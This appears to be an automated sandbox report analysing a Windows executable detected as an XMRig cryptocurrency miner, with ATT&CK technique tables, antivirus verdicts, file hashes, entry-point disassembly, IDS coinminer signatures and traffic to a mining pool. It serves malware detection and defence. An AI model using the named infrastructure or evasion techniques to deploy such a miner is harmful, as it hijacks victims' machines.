Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 5_2_000000014031010C |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 Windows Service | 1 Windows Service | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | Data from Local System | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Side-Loading | 611 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 211 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 121 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 611 Process Injection | NTDS | 121 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
60% | Virustotal | Browse | ||
61% | ReversingLabs | Win64.Trojan.Donut | ||
100% | Avira | HEUR/AGEN.1344832 | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
4% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
pool.hashvault.pro | 192.248.189.11 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
80.240.16.67 | unknown | Germany | 20473 | AS-CHOOPAUS | true | |
192.248.189.11 | pool.hashvault.pro | France | 20473 | AS-CHOOPAUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589435 |
Start date and time: | 2025-01-12 14:18:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 7s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 9d2h99wrj.exe |
Detection: | MAL |
Classification: | mal100.evad.mine.winEXE@12/11@2/2 |
EGA Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
- Exclude process from analysis
(whitelisted): MpCmdRun.exe, W MIADAP.exe, SIHClient.exe, con host.exe, WmiPrvSE.exe - Excluded IPs from analysis (wh
itelisted): 4.245.163.56, 13.1 07.246.45 - Excluded domains from analysis
(whitelisted): ocsp.digicert. com, slscr.update.microsoft.co m, otelrules.azureedge.net, ct ldl.windowsupdate.com, fe3cr.d elivery.mp.microsoft.com - Execution Graph export aborted
for target notepad.exe, PID 7 112 because there are no execu ted function - Not all processes where analyz
ed, report is missing behavior information - Report size getting too big, t
oo many NtCreateKey calls foun d.
Time | Type | Description |
---|---|---|
08:19:02 | API Interceptor | |
08:19:05 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
80.240.16.67 | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse | ||
Get hash | malicious | Xmrig | Browse | |||
192.248.189.11 | Get hash | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | Browse | ||
Get hash | malicious | Xmrig | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
pool.hashvault.pro | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse |
| |
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | Browse |
| ||
Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | DarkVision Rat, Xmrig | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
AS-CHOOPAUS | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse |
| |
Get hash | malicious | I2PRAT | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
AS-CHOOPAUS | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse |
| |
Get hash | malicious | I2PRAT | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Get hash | malicious | Python Stealer, Exela Stealer, Xmrig | Browse | ||
Get hash | malicious | PureLog Stealer, Xmrig, zgRAT | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse | |||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | Browse | |||
Get hash | malicious | Blank Grabber, Xmrig | Browse | |||
Get hash | malicious | Xmrig | Browse |
Process: | C:\Windows\System32\conhost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1267 |
Entropy (8bit): | 5.355115896011818 |
Encrypted: | false |
SSDEEP: | 24:ML9E4KQMsXE4Np/E4K9E4KnKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQrHNp/HK9HKnYHKGSI6oPtHTHhA2 |
MD5: | 5B8589D00296CA4291880EAC82B43B1D |
SHA1: | 6C11FD4FCD6B9B3762F048BBF45EE0516BF668B3 |
SHA-256: | F207A0EAD4836653A8CCA1C28C08BB0772EAB1743E7E8136064C31CC3883DD99 |
SHA-512: | A938DDC717A9EF0FCBC4C69813CA409F0E67FF996854A61ED0C2D41FFD06386936A564669C6D50921A2088FC814CE94CA74AF91F0644E5678852BF50E9280BF8 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.34726597513537405 |
Encrypted: | false |
SSDEEP: | 3:Nlll:Nll |
MD5: | 446DD1CF97EABA21CF14D03AEBC79F27 |
SHA1: | 36E4CC7367E0C7B40F4A8ACE272941EA46373799 |
SHA-256: | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
SHA-512: | A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\conhost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 14544 |
Entropy (8bit): | 6.2660301556221185 |
Encrypted: | false |
SSDEEP: | 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ |
MD5: | 0C0195C48B6B8582FA6F6373032118DA |
SHA1: | D25340AE8E92A6D29F599FEF426A2BC1B5217299 |
SHA-256: | 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5 |
SHA-512: | AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
File type: | |
Entropy (8bit): | 7.999991889029266 |
TrID: |
|
File name: | 9d2h99wrj.exe |
File size: | 31'161'344 bytes |
MD5: | 88848246ce109235a762fcd193210caa |
SHA1: | 9bbe1f1ef018b4cf4f9b4df15bd0904ab4f2ff5e |
SHA256: | ae9bec259aef6380ed576361d588180e1850742708c24e60dc92fe07d0fb90c9 |
SHA512: | 3a4f5a41631b40bed2224cb4bdffaebd83cf40a8afa775623ecfa019928a1dfcdc749b4dc050dc6dfb54798add3e3d65424383cb37f422df5f79b492891cd999 |
SSDEEP: | 786432:YWC/VCO2W2JqrlTY25R6DTrqBDfIRwwoSPDitdV2jFj3qW3yq:BaVCO12YM25RyeTIRuN2R5i |
TLSH: | FF6733D123DD1175EF4671681E9B8DD6B4BE296CE89AE1C0BFD2131B260DE0E8504EBC |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........b......."........@......................................,..................................... |
Icon Hash: | 90cececece8e8eb0 |
Entrypoint: | 0x4022fa |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED |
DLL Characteristics: | |
Time Stamp: | 0x0 [Thu Jan 1 00:00:00 1970 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 02549ff92b49cce693542fc9afb10102 |
Instruction |
---|
push ebp |
dec eax |
mov ebp, esp |
dec eax |
sub esp, 00000040h |
dec eax |
mov eax, 00000004h |
add byte ptr [eax], al |
add byte ptr [eax], al |
dec ecx |
mov eax, eax |
mov eax, 00000000h |
dec ecx |
mov ebx, eax |
dec eax |
lea eax, dword ptr [ebp-04h] |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
dec esp |
mov edx, ebx |
call 00007F85D8BCBF21h |
dec eax |
lea eax, dword ptr [FFFFFF98h] |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
call 00007F85D8BCBF3Fh |
mov eax, 00000001h |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
call 00007F85D8BCBF37h |
mov eax, 00030000h |
dec ecx |
mov ebx, eax |
mov eax, 00010000h |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
dec esp |
mov edx, ebx |
call 00007F85D8BCBF24h |
dec eax |
mov eax, dword ptr [01DB6824h] |
dec eax |
mov ecx, dword ptr [01DB6825h] |
dec eax |
mov edx, dword ptr [01DB6826h] |
dec eax |
mov dword ptr [ebp-10h], eax |
dec eax |
lea eax, dword ptr [ebp-04h] |
dec eax |
mov dword ptr [esp+20h], eax |
mov eax, dword ptr [01DB7C17h] |
dec ecx |
mov ecx, eax |
dec ecx |
mov eax, edx |
dec ecx |
mov ebx, ecx |
dec eax |
mov eax, dword ptr [ebp-10h] |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
dec esp |
mov edx, ebx |
call 00007F85D8BCBEE9h |
dec eax |
mov eax, dword ptr [01DB67E1h] |
dec eax |
mov ecx, dword ptr [01DB67E2h] |
dec eax |
mov edx, dword ptr [01DB67E3h] |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1db8b30 | 0x3c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1dbb000 | 0x1f0 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1dba000 | 0x90 | .pdata |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1db8b6c | 0x90 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x14e0 | 0x1600 | 13853b963b201ea16f713421eaf302fb | False | 0.3283025568181818 | data | 5.435530746793809 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x3000 | 0x1db5d6e | 0x1db5e00 | 5c5669048d44bdd74b60c56a40f08300 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.bss | 0x1db9000 | 0xfac | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.pdata | 0x1dba000 | 0x90 | 0x200 | 833d670d56c423f97067d7571a397b78 | False | 0.17578125 | data | 1.2087156271204966 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0x1dbb000 | 0x1f0 | 0x200 | 042f8dc0c5470b0dce68fda4d1872eb1 | False | 0.53125 | data | 4.831618991015907 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_MANIFEST | 0x1dbb058 | 0x198 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text | English | United States | 0.553921568627451 |
DLL | Import |
---|---|
msvcrt.dll | malloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit |
kernel32.dll | Sleep, CreateProcessA, SetUnhandledExceptionFilter |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Download Network PCAP: filtered – full
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-12T14:19:06.623850+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.4 | 49730 | 80.240.16.67 | 443 | TCP |
2025-01-12T14:19:08.414148+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.4 | 57699 | 1.1.1.1 | 53 | UDP |
2025-01-12T14:20:10.875041+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.4 | 51665 | 1.1.1.1 | 53 | UDP |
- Total Packets: 32
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 12, 2025 14:19:08.425515890 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:08.425563097 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:08.425632000 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:08.425708055 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:08.425715923 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:08.426218033 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:14.421180964 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:14.421278000 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:14.421372890 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:14.421504021 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:14.421535015 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:14.421670914 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:19.452370882 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:19.452404976 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:19.452486992 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:19.452625990 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:19.452634096 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:19.452780962 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:24.483525038 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:24.483618021 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:24.483721972 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:24.497188091 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:24.497225046 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:24.497502089 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:29.530535936 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:29.530587912 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:29.530689001 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:29.530853987 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:29.530868053 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:29.531131983 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:34.608056068 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:34.608150959 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:34.608226061 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:34.608597994 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:34.608624935 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:34.608745098 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:39.649596930 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:39.649688005 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:39.649766922 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:39.649863005 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:39.649880886 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:39.650091887 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:44.686709881 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:44.686795950 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:44.686907053 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:44.687077045 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:44.687117100 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4 |
